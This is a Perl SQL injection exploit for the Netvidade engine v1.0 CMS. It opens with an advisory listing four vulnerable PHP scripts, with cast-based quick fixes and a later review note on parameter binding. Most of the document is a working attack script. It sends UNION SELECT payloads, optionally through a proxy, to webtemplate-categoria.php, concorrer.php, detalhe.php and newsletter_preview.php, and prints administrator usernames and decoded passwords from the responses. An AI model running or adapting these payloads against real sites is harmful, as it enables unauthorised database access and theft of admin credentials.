#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use Getopt::Long;
use MIME::Base64;

#                              \#'#/
#                              (-.-)
# ----------------------oOO---(_)---OOo----------------------
# |                __              __                       |
# |   _____/ /_____ ______/ /_  __  ______ ______           |
# |  / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/           |
# | (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )            |
# |/____/\__/\__,_/_/  /_.___/\__,_/\__, /____/             |
# |  Security Research Division     /____/            2o1o  |
# -----------------------------------------------------------
# |     Netvidade engine v1.0 Multiple Vulnerabilities      |
# -----------------------------------------------------------
# [!] Discovered by.: pwndomina
# [!] Vendor........: http://www.netvidade.com
# [!] Detected......: 15.04.2010
# [!] Reported......: 06.05.2010
# [!] Response......: xx.xx.2010
#
# Advisory summary (reviewer's reading of the material below): all four
# affected PHP scripts pass $_GET['id'] unchanged into a method that
# interpolates it straight into a SQL string, so the request parameter
# becomes part of the query text.  The "Quick fix" sections at the end
# are the vendor-side patch; see the review note after them.
#
# [!] Bug...........: $_GET['id'] in webtemplate-categoria.php near line 6
#
#   3: if ($_GET['id']==0)
#   4:     $lista_webtemp=$netvidade->lista_webtemp();
#   5: else
#   6:     $lista_webtemp=$netvidade->lista_webtemp_categoria($_GET['id']);
#
# The function lista_webtemp_categoria() is in class/var/netvidade.class.php near line 212
#
# 212: function lista_webtemp_categoria($id)
# 213: {
# 214:     $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=$id";
# 215:     $a=$this->CORE->db();
# 216:     $res=$a->abrecursor($query);
# 217:     return $res;
# 218: }
#
# [!] Bug...........: $_GET['id'] in concorrer.php near line 2
#
#   2: $lista_proposta=$recrutamento->lista_proposta($_GET['id']);
#
# The function lista_proposta() is in class/var/recrutamento.class.php near line 42
#
#  42: function lista_proposta($id)
#  43: {
#  44:     $query="select * from recrutamento_propostas where id=$id";
#  45:     $a=$this->CORE->db();
#  46:     $res=$a->abrecursor($query);
#  47:     return $res;
#  48: }
#
# [!] Bug...........: $_GET[id] in detalhe.php near line 6
#
#   6: $noticias=$a->lista_noticia_detalhe($_GET[id]);
#
# The function lista_noticia_detalhe() is in class/var/noticias.class.php near line 208
#
# 208: function lista_noticia_detalhe($id)
# 209: {
# 210:     $query="
# 211:         select a.*,b.id as categoria_id, b.titulo as categoria_nome, c.nome as autor_nome
# 212:         from noticias a, noticias_categorias b, administradores c
# 213:         where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
# 214:     ";
# 215:
# 216:     $a=$this->CORE->db();
# 217:     $res=$a->abrecursor($query);
# 218:     return $res;
# 219: }
#
# [!] Bug...........: $_GET[id] in newsletter_preview.php near line 6
#
#   6: $dados=$a->lista_newsletter($_GET[id]);
#
# The function lista_newsletter() is in class/var/newsletter.class.php near line 113
#
# 113: function lista_newsletter($id)
# 114: {
# 115:     $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=$id";
# 116:     $a=$this->CORE->db();
# 117:     $res=$a->abrecursor($query);
# 118:     return $res;
# 119: }
#
# [!] Quick fix.....: in class/var/netvidade.class.php line 214
#
# - replace:
#   $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=$id";
#
# - with:
#   $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=".(int)$id;
#
# [!] Quick fix.....: in class/var/recrutamento.class.php line 44
#
# - replace:
#   $query="select * from recrutamento_propostas where id=$id";
#
# - with:
#   $query="select * from recrutamento_propostas where id=".(int)$id;
#
# [!] Quick fix.....: in class/var/noticias.class.php line 213
#
# - replace:
#   where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#
# - with:
#   where a.categoria=b.id and a.id=".(int)$id." and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#
# [!] Quick fix.....: in class/var/newsletter.class.php line 115
#
# - replace:
#   $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=$id";
#
# - with:
#   $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=".(int)$id;
#
# Review note on the quick fixes: the (int) casts close these four call
# sites and are adequate only because the value is meant to be numeric.
# The durable fix for the whole class is to stop interpolating $id into
# the query text and bind it as a parameter instead (whether the db layer
# behind abrecursor() supports bound parameters is not visible here).
#
# [!] Greetings.....: cih.ms and phact.in

# Usage banner.  GetOptions has not run yet at this point, so @ARGV still
# holds the option words: testing $ARGV[3] means "at least four
# command-line tokens" (host, path, -t, N), not "a fourth positional
# argument".  Anything shorter prints the help text and exits.
if(!$ARGV[3]) {
    print "\n \\#'#/ ";
    print "\n (-.-) ";
    print "\n ---------------------oOO---(_)---OOo----------------------";
    print "\n | Netvidade engine v1.0 Multiple Vulnerabilities Exploit |";
    print "\n | discovered by pwndomina |";
    print "\n | coded by DNX |";
    print "\n ----------------------------------------------------------";
    print "\n[!] Usage: perl netvidade.pl [Host] [Path] [Target] ";
    print "\n[!] Example: perl netvidade.pl www.host.com /path/ -t 3 -u 1";
    print "\n[!] Targets:";
    print "\n -t 1 webtemplate-categoria.php";
    print "\n -t 2 concorrer.php";
    print "\n -t 3 detalhe.php";
    print "\n -t 4 newsletter_preview.php";
    print "\n[!] Options:";
    print "\n -u [no] User-Id";
    print "\n -p [ip:port] Proxy support";
    print "\n[!] Notes:";
    print "\n For the targets 2, 3 & 4 you can use -u option.";
    print "\n";
    exit;
}

# -t selects the target script (integer), -u an id (integer), -p a proxy
# (string).  GetOptions removes the option words from @ARGV, so the two
# positional arguments read below are host and path.
my %options = ();
GetOptions(\%options, "t=i", "u=i", "p=s");

my $ua = LWP::UserAgent->new();
my $host = $ARGV[0];
my $path = $ARGV[1];
# NOTE(review): $target is assigned but never read — each exploitN() below
# rebuilds the URL from $host and $path itself.
my $target = "http://".$host.$path;
my $userid = "";

# -p routes every request through the given ip:port.
if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }

# -u becomes a "+where+id=N" fragment that exploit2/3/4 append to their
# URL; exploit1 does not use it, which matches the Notes in the banner.
if($options{"u"}) { $userid = "+where+id=".$options{"u"}; }

print "[!] Exploiting...\n\n";

# Dispatch on -t.  Without -t none of the branches matches and the script
# only prints the two status lines; under -w the numeric compare against
# an undefined $options{"t"} also emits an "uninitialized value" warning.
if($options{"t"} == 1) { exploit1(); }
elsif($options{"t"} == 2) { exploit2(); }
elsif($options{"t"} == 3) { exploit3(); }
elsif($options{"t"} == 4) { exploit4(); }

print "\n[!] Exploit done\n";

# Target 1: webtemplate-categoria.php (advisory: netvidade.class.php
# line 214).  The 0x23 ('#') bytes wrapped around the selected columns
# are the markers check() looks for in the response body; from the
# defender's side those same delimiters and the "union select" in the
# query string are what request logging or a WAF rule would key on.
sub exploit1 {
    my $url = "http://".$host.$path."webtemplate-categoria.php?id=-1337+union+select+1,2,concat(0x23,0x23,username,0x23,password,0x23,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+administradores";
    my $res = $ua->get($url);
    check($res);
}

# Target 2: concorrer.php (advisory: recrutamento.class.php line 44).
# Appends the -u fragment ($userid, empty when -u is not given).
sub exploit2 {
    my $url = "http://".$host.$path."concorrer.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6,7,8,9,10+from+administradores".$userid;
    my $res = $ua->get($url);
    check($res);
}

# Target 3: detalhe.php (advisory: noticias.class.php line 213).  This is
# the only target that also appends a trailing "/*" after $userid.
sub exploit3 {
    my $url = "http://".$host.$path."detalhe.php?id=-1337+union+select+1,2,3,concat(0x23,0x23,username,0x23,password,0x23,0x23),5,6,7,8,9,10,11,12,13,14+from+administradores".$userid."/*";
    my $res = $ua->get($url);
    check($res);
}

# Target 4: newsletter_preview.php (advisory: newsletter.class.php
# line 115).  Appends the -u fragment like target 2.
sub exploit4 {
    my $url = "http://".$host.$path."newsletter_preview.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6+from+administradores".$userid;
    my $res = $ua->get($url);
    check($res);
}

# Scan the response body line by line for the ##first#second## markers
# planted by the query and print "first:second".  The second field is run
# through decode_base64, i.e. the script assumes the stored value is
# base64 text; nothing on this page shows the application's storage
# format — TODO confirm.  The HTTP status is never checked: $res->content
# is read regardless of whether the request succeeded, and the regex
# takes the first, shortest match on each line.
sub check {
    my $res = shift;
    my $content = $res->content;
    my @c = split(/\n/, $content);
    foreach (@c) {
        if($_ =~ /##(.*?)#(.*?)##/) {
            print $1.":".decode_base64($2)."\n";
        }
    }
}